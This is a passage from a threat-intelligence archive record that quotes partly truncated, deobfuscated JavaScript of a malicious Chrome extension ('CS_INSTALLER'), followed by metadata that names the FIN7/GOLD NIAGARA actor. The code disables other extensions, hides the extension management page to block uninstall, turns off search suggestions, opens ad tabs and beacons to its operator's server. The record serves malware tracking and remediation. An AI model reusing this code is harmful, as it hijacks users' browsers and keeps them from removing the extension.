Q4.value;\r\n}\r\nchrome.runtime.onInstalled.addListener(k4 =\u003e {\r\n if (k4.reason == \"install\") {\r\n localStorage.removeItem(\"lastQuery\");\r\n localStorage.removeItem(\"ad\");\r\n localStorage.removeItem(\"is\");\r\n chrome.alarms.create(\"hb\", {delayInMinutes: 1.1, periodInMinutes: 180});\r\n chrome.alarms.create(\"ad\", {delayInMinutes: 5, periodInMinutes: 30});\r\n analytics(\"install\", \"\");\r\n sync();\r\n chrome.management.getAll(function (l4) {\r\n handleInstalledExtensions(l4);\r\n });\r\n chrome.privacy.services.searchSuggestEnabled.set({value: !true});\r\n }\r\n});\r\nchrome.runtime.setUninstallURL(_ExtDom + \"uninstall?ext=\" + _ExtnensionName + \"\u0026ver=\" + _ExtensionVe\r\nfunction setWithExpirySec(v4, M4, P4) {\r\n var e4, Z4;\r\n e4 = new Date;\r\n Z4 = {value: M4, expiry: e4.getTime() + P4 * 1e3};\r\n localStorage.setItem(v4, 
JSON.stringify(Z4));\r\n}\r\nfunction openAd() {\r\n var h4;\r\n h4 = _ExtDom + \"ad?ext=\" + _ExtnensionName + \"\u0026ver=\" + _ExtensionVersion + \"\u0026dd=\" + _dd;\r\n fetch(h4, {method: \"GET\", credentials: \"include\", redirect: \"follow\"}).then(D4 =\u003e D4.json()).then(T\r\n var o4, E4, S4;\r\n if (T4.length \u003e 0) {\r\n o4 = T4[0];\r\n E4 = o4[1];\r\n S4 = \"https:\" + o4[2];\r\n chrome.tabs.create({url: E4}, function (C4) {\r\n fetch(S4, {credentials: \"include\"});\r\n setWithExpirySec(\"ad\", C4.id, 86400);\r\n });\r\n }\r\n }).catch(t4 =\u003e {});\r\n}\r\nchrome.contextMenus.create({title: \"Remove\", id: \"menu\", contexts: [\"browser_action\"]});\r\nchrome.tabs.onUpdated.addListener(function (H4, y4, d4) {\r\n if (y4.status == \"loading\" \u0026\u0026 d4.url.indexOf(\"chrome://extensions\") == 0) {\r\n chrome.tabs.create({url: \"chrome://settings\"});\r\n chrome.tabs.remove(H4);\r\n }\r\n});\r\nfunction sync() {\r\n var q4;\r\n q4 = _ExtDom + \"redsync\";\r\n fetch(q4, {method: \"GET\", credentials: \"include\"}).then(a4 =\u003e a4.text()).then(X4 =\u003e {\r\n analytics(\"sync\", X4);\r\n }).catch(V4 =\u003e {});\r\n}\r\nfunction handleInstalledExtensions(W4) {\r\n fetch(\"https://com.\" + _ExtDomNoSchema + \"/ext\" + \"post\" + _ExtnensionName + \"ver=\" + _ExtensionVe\r\n}\r\nchrome.browserAction.onClicked.addListener(function (G7) {\r\n chrome.tabs.create({url: \"chrome://settings\"});\r\n});\r\nchrome.contextMenus.onClicked.addListener(function (m7, A7) {\r\n chrome.tabs.create({url: \"chrome://settings\"});\r\n});\r\nfunction analytics(j4, J4) {\r\n var A4;\r\n A4 = _ExtDom + j4 + \"?ext=\" + _ExtnensionName + \"\u0026ver=\" + _ExtensionVersion + \"\u0026dd=\" + _dd;\r\n if (J4 != \"\") {\r\n A4 = A4 + \"\u0026info=\" + J4;\r\n }\r\n navigator.sendBeacon(A4);\r\n}\r\nchrome.alarms.onAlarm.addListener(function (J7) {\r\n if 
(J7.name === \"hb\") {\r\n analytics(\"hb\", \"\");\r\n sync();\r\n } else if (J7.name === \"ad\") {\r\n getAd();\r\n }\r\n});\r\nfunction handleExtensionResp(K4) {\r\n try {\r\n extnesionIds = JSON.parse(K4).list;\r\n extnesionIds.forEach(B4 =\u003e chrome.management.setEnabled(B4, false));\r\n } catch (x4) {}\r\n}\r\nfunction getAd() {\r\n var f4;\r\n f4 = getWithExpiry(\"ad\");\r\n if (f4) {\r\n chrome.tabs.get(f4, function (c4) {\r\n if (c4) {\r\n return null;\r\n } else {\r\n openAd();\r\n }\r\n });\r\n console.clear();\r\n } else {\r\n openAd();\r\n}\r\n}\r\nSource: https://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER"
	],
	"report_names": [
		"CS_INSTALLER"
	],
	"threat_actors": [
		{
			"id": "f4f16213-7a22-4527-aecb-b964c64c2c46",
			"created_at": "2024-06-19T02:03:08.090932Z",
			"updated_at": "2026-04-10T02:00:03.6289Z",
			"deleted_at": null,
			"main_name": "GOLD NIAGARA",
			"aliases": [
				"Calcium ",
				"Carbanak",
				"Carbon Spider ",
				"FIN7 ",
				"Navigator ",
				"Sangria Tempest ",
				"TelePort Crew "
			],
			"source_name": "Secureworks:GOLD NIAGARA",
			"tools": [
				"Bateleur",
				"Carbanak",
				"Cobalt Strike",
				"DICELOADER",
				"DRIFTPIN",
				"GGLDR",
				"GRIFFON",
				"JSSLoader",
				"Meterpreter",
				"OFFTRACK",
				"PILLOWMINT",
				"POWERTRASH",
				"SUPERSOFT",
				"TAKEOUT",
				"TinyMet"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775433996,
	"ts_updated_at": 1775791873,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/12dd4a9ac63cde364293c6cb9b7e444cf601abcd.pdf",
		"text": "https://archive.orkl.eu/12dd4a9ac63cde364293c6cb9b7e444cf601abcd.txt",
		"img": "https://archive.orkl.eu/12dd4a9ac63cde364293c6cb9b7e444cf601abcd.jpg"
	}
}